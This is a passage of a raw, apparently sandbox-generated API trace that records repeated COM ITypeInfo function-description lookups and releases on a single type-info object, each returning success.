ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.174] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.175] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.175] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.176] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.176] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.177] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.177] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] 